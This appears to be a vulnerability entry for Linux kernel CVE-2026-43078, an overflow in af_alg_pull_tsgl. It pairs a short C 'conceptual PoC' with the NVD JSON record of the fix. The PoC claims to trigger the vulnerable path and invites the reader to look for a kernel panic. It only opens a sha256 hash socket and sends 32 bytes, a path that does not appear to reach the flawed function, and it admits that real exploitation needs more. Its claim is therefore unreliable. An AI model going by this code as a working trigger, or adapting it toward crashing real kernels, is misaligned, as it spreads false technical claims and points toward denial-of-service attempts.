CVE-2026-43078

// This is a conceptual PoC for CVE-2026-43078 // It demonstrates how to interact with AF_ALG to trigger the path. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/if_alg.h> int main() { int tfmfd, opfd; struct sockaddr_alg sa = { .salg_family = AF_ALG, .salg_type = "hash", .salg_name = "sha256" }; char buf[32] = {0}; // Create algorithm socket tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0); if (tfmfd < 0) { perror("socket"); return 1; } // Bind with specific algorithm if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) < 0) { perror("bind"); close(tfmfd); return 1; } // Create operation socket opfd = accept(tfmfd, NULL, 0); if (opfd < 0) { perror("accept"); close(tfmfd); return 1; } // Send data to trigger af_alg_pull_tsgl logic // Real exploitation requires specific size and timing to hit the overflow if (send(opfd, buf, sizeof(buf), 0) < 0) { perror("send"); } else { printf("Data sent. Check kernel logs for panic/crash."); } close(opfd); close(tfmfd); return 0; }

{"cve": {"id": "CVE-2026-43078", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T10:16:20.853", "lastModified": "2026-05-08T13:16:38.417", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: af_alg - Fix page reassignment overflow in af_alg_pull_tsgl\n\nWhen page reassignment was added to af_alg_pull_tsgl the original\nloop wasn't updated so it may try to reassign one more page than\nnecessary.\n\nAdd the check to the reassignment so that this does not happen.\n\nAlso update the comment which still refers to the obsolete offset\nargument."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/2b781d1d4f933990318bcc5c68fb75a717379e42", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/31d00156e50ecad37f2cb6cbf04aaa9a260505ef", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/710a4ce5d7afd9fe082c75dec282ab4a11c0fe71", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/9532501e0f1b200ea80baa0e33e0b06da10bb271", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/c8369a6d62f5abde9cbd4b62c45bf4b996be2468", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/dea5fcf085f977b6c2de1b2d4ec4767b6c840d1f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/f7826bc0b39928a4a22f6b815dd9940b22a63503", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/fa48d3ea9cdbfb28c1fd6756c6c5cd01351aa51e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}